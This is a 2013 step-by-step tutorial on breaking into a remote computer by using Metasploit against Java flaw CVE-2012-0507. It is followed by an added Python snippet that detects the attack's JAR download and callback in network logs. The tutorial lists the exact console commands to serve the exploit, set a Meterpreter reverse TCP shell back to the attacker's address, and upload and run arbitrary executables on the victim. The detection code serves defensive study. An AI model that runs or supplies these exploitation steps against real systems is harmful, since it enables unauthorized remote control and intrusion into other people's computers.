March 22, 2013

How to hack a remote computer using Metasploit by exploiting Java vulnerability CVE-2012-0507 (For advanced hackers)
In this post (from BreakTheSecurity) I am going to demonstrate how to use the Metasploit tool to exploit the popular Java AtomicReferenceArray Type Violation vulnerability (CVE-2012-0507).
Requirements:
VirtualBox
Target OS (Windows,...)
PenTesting distro (BackTrack)
JRE 6 (unpatched version)
I am assuming you already know how to set up virtual machines, how to install BackTrack, etc.
Part I: Preparing the Target Machine:
Start the "Target" machine.
Install JRE 6.
Part II: Preparing the PenTesting Machine:
Now, start BT5.
Open the Terminal and type "msfupdate". This will update the Metasploit Framework (MSF) with the latest exploits and payloads. As CVE-2012-0507 is a recent vulnerability, you have to update MSF before proceeding further.
Part III: Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:
Step 1:
Open the Terminal and type "msfconsole". This will bring up the Metasploit console, where you can interact with MSF.
Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray". This command will use the java_atomicreferencearray.rb module for the attack.
Now type "show options" to display which settings are available and/or required for this specific module.
Then type "set SRVPORT 80" and "set URIPATH /".
Step 3: Set Payload
Type "show payloads"; this will display the list of payloads. We are going to use the 'reverse_tcp' payload. This payload makes the Target open a reverse TCP connection back to the PenTesting machine.
Type "set payload java/meterpreter/reverse_tcp" in the console.
set LHOST [IP_address]: In order to get the reverse connection, we have to set our IP in LHOST.
Open the Terminal and type "ifconfig". This will display the IP info of our PenTesting machine. The IP will be "192.168.56.x". E.g., let me say the IP is 192.168.56.10.
Now type "set LHOST 192.168.56.10" in the msfconsole.
Part IV: Breaching the Target Machine:
So, are you ready?! Let us break into the Target machine.
Step 1:
Type "exploit" in the msfconsole. This will start the reverse handler on our machine, and it will wait for anyone who connects to our HTTP server (e.g. http://192.168.56.10/). Once the victim connects to our server, it will send a JAR file that will exploit the CVE-2012-0507 vulnerability.
Step 2:
Open Firefox/IE on the Target machine.
Enter "http://192.168.56.10/".
It loads nothing, but the exploit will run in the background.
Step 3:
Go back to the BT5 machine.
Now type "sessions"; this will show the list of active sessions.
Type "sessions -i 1"; this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter lets you interact with and control the Target.
Step 4: Upload files
We now have a backdoor into the Target machine :), so we can run any commands on the Target.
For example, typing 'sysinfo' will display the system information.
You can also upload and execute your own executable files on the Target machine.
"upload /Test.exe c:\\": this command will upload Test.exe from the root ('File System' dir) folder of BT5 to the C drive of the Target.
"execute -f C:\\Test.exe": this command will run our uploaded file on the Target.
There you have it. Now you are in the remote computer and you can do pretty much anything :)
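
Seen from the defender's side, Part IV leaves a recognisable sequence in network telemetry: a client is served a JAR over HTTP and, moments later, opens a new TCP connection to the same machine on a different port. The Python below is an added example, not part of the original post, that correlates proxy and flow records to flag that sequence; the log layouts, the client addresses, port 5555, the paths and the 30-second window are all assumptions constructed for illustration.

```python
from datetime import datetime

JAR_MIME = "application/java-archive"

# Constructed sample telemetry (not from the original post). 192.168.56.10 is
# the post's example server; every other address, port and path is made up.
# Proxy log: (time, client, server, server_port, path, content_type)
PROXY_LOG = [
    ("2013-03-22 10:00:01", "192.168.56.20", "192.168.56.10", 80, "/", "text/html"),
    ("2013-03-22 10:00:02", "192.168.56.20", "192.168.56.10", 80, "/x.jar", JAR_MIME),
    ("2013-03-22 10:05:00", "192.168.56.21", "192.168.56.30", 80, "/lib/app.jar", JAR_MIME),
]
# Flow log of new TCP connections: (time, src, dst, dst_port)
FLOW_LOG = [
    ("2013-03-22 09:59:50", "192.168.56.20", "192.168.56.10", 5555),  # before the JAR
    ("2013-03-22 10:00:03", "192.168.56.20", "192.168.56.10", 80),    # same web port
    ("2013-03-22 10:00:04", "192.168.56.20", "192.168.56.10", 5555),  # callback pattern
    ("2013-03-22 10:05:03", "192.168.56.21", "192.168.56.40", 443),   # different host
]


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def find_jar_then_callback(proxy_log, flow_log, window_s=30):
    """Flag clients that fetch a JAR over HTTP and then, within window_s
    seconds, open a new TCP connection to the same server on another port.
    Returns a list of (client, server, jar_path, callback_port)."""
    hits = []
    for when, client, server, web_port, path, ctype in proxy_log:
        if ctype != JAR_MIME and not path.lower().endswith(".jar"):
            continue  # not a Java archive download
        jar_time = _ts(when)
        for f_when, src, dst, dport in flow_log:
            delay = (_ts(f_when) - jar_time).total_seconds()
            if (src, dst) == (client, server) and dport != web_port \
                    and 0 <= delay <= window_s:
                hits.append((client, server, path, dport))
    return hits


if __name__ == "__main__":
    for hit in find_jar_then_callback(PROXY_LOG, FLOW_LOG):
        print("ALERT jar download followed by callback:", hit)
```

A hit is a lead for triage rather than proof of compromise, since legitimate Java applications also download JARs and then connect back to their server.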
